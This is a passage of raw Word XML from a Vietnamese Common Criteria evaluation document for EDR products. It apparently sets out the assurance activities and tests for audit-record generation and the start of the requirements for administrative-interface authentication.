      <w:r w:rsidR="008D70AF" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chỉ định</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thông tin liên quan đến kiểm toán khác</w:t>
      </w:r>
      <w:r w:rsidR="00B109FE" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F99BB77" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Yêu cầu này phác thảo thông tin điện tử sẽ được đưa vào hồ sơ kiểm toán. Tất cả các cuộc kiểm toán phải chứa ít nhất thông tin được đề cập trong FAU_GEN.1.2 / EDR, nhưng có thể chứa nhiều thông tin hơn có thể được chỉ định.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B9A3C5" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động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563"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="1BC93170" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77CC6061" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="769A62B2" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoạt động đảm bảo </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="0186309D" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107A6963" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4329AA52" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra để xác định TSS liệt kê tất cả các sự kiện có thể kiểm toán được yêu cầu trong SFR. Đánh giá viên phải kiểm tra để đảm bảo rằng mọi loại sự kiện kiểm toán do SFR chỉ định đều được mô tả trong TSS.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3077DDD6" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Đánh giá viên phải kiểm tra để xác định TSS cung cấp một định dạng cho hồ sơ kiểm toán. Mỗi loại định dạng chuỗi kiểm toán phải được bao quát cùng với mô tả ngắn gọn về từng trường.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="098F02EE" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1403B0A8" w14:textId="528B8F46" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00DE3774" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Hướng dẫn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C9CEAA8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra hướng dẫn vận hành và xác định TSS liệt kê tất cả các sự kiện có thể kiểm toán được yêu cầu trong SFR. Đánh giá viên phải kiểm tra để đảm bảo rằng mọi loại sự kiện kiểm toán do SFR bắt buộc đều được mô tả.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE31B44" w14:textId="420CFD0B" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra hướng dẫn vận hành và xác định các lệnh nào có liên quan đến cấu hình (bao gồm cho phép hoặc vô hiệu hóa) các cơ chế được thực hiện trong EDR cần thiết để thực thi các yêu cầu được chỉ định trong PP-module. Đánh giá viên phải ghi lại phương pháp hoặc cách tiếp cận được thực hiện trong khi xác định hành động nào trong</w:t>
            </w:r>
            <w:r w:rsidR="005A544E" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">hướng dẫn vận hành có liên quan đến </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> liên quan đến PP-Module này. Đánh giá viên có thể thực hiện hoạt động này như một phần của các hoạt động liên quan đến việc đảm bảo AGD_OPE hướng dẫn đáp ứng các yêu cầu.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5599D50C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải kiểm tra hướng dẫn vận hành và xác định TSS cung cấp một định dạng cho hồ sơ kiểm toán. Mỗi loại định dạng bản ghi kiểm toán phải được bảo hiểm, cùng với một mô tả ngắn gọn về từng trường. Đánh giá viên phải kiểm tra để đảm bảo rằng mô tả của các trường chứa thông tin cần thiết trong FAU_GEN.1.2 / EDR.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="601D2905" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E702892" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8647" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD14726" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Đánh giá viên phải thực hiện các thử nghiệm sau:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AA35C0A" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 1:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải đăng nhập vào giao diện quản trị EDR và xác minh rằng dữ liệu nhật ký kiểm tra mô tả các hoạt động được ghi lại.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="480EC04D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 2:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải đưa ra lệnh khắc phục hợp lệ do EDR cung cấp cho Tác nhân máy chủ, lần thứ hai xác minh rằng dữ liệu nhật ký kiểm tra mô tả hoạt động được ghi lại trên giao diện quản trị EDR.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78F42D8D" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 3:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải thay đổi tùy chọn cấu hình EDR không phá hoại trong giao diện quản trị EDR, thay đổi nó trở lại cài đặt ban đầu và xác minh rằng dữ liệu nhật ký đánh giá mô tả hoạt động được ghi lại.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A84636C" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thử nghiệm 4:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đánh giá viên phải thực hiện hành động để tạo ra tất cả các sự kiện có thể đánh giá khác được liệt kê trong nhiệm vụ và xác minh hoạt động được ghi lại. Khi xác minh kết quả kiểm tra từ FAU_GEN.1.1 / EDR, Đánh giá viên phải đảm bảo hồ sơ kiểm toán được tạo trong quá trình thử nghiệm khớp với định dạng được chỉ định tronghướng dẫn quản trị và các trường trong mỗi hồ sơ kiểm toán có mục nhập thích hợp.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53E700F9" w14:textId="4C0552A8" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Lưu ý:</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Việc thử nghiệm ở đây có thể được thực hiện cùng với việc kiểm tra trực tiếp các cơ chế </w:t>
            </w:r>
            <w:r w:rsidR="00A35DB0" w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>đảm bảo an toàn</w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. Ví dụ: thử nghiệm được thực hiện để đảm bảo rằnghướng dẫn vận hành được cung cấp là chính xác, xác minh rằng AGD_OPE.1 được thoả mãn </w:t>
            </w:r>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>và thực hiện các hành động quản trị cần thiết để xác minh hồ sơ kiểm toán được khởi tạo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BB997A" w14:textId="739C56A4" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc502096853"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>FIA</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00475C38" w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Định danh</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> và xác thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFBD668" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> FIA_AUT_EXT.1 Cơ chế xác thực giao diện quản trị</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345D1BA3" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FIA_AUT_EXT.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FA1D78" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EDR phải có một trong các tính năng: tận dụng nền tảng để xác thực, cung cấp xác thực dựa trên tên người dùng/mật khẩu và lựa chọn xác thực bằng thẻ thông minh bên ngoài và mã PIN, để hỗ trợ đăng nhập vào bất kỳ giao diện quản trị hoặc API nào.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00497BF5" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lưu ý áp dụng</w:t>
      </w:r>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lựa chọn chỉ định nếu Smartcards cũng được hỗ trợ, thì phải có lựa chọn bổ sung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E25271E" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204C5F">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hoạt động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703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="0798BF14" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="125A7DD3" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3499B3F0" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:b/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoạt động đảm bảo </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w14:paraId="7C6F9836" w14:textId="77777777" w:rsidTr="00C42841">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1384" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E72149" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00204C5F">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>TSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8789" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02F497C8" w14:textId="77777777" w:rsidR="00D63D1D" w:rsidRPr="00204C5F" w:rsidRDefault="00D63D1D" w:rsidP="00BD2F41">
            <w:pPr>
              <w:spacing w:before="60"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:i/>
                <w:iCs/>
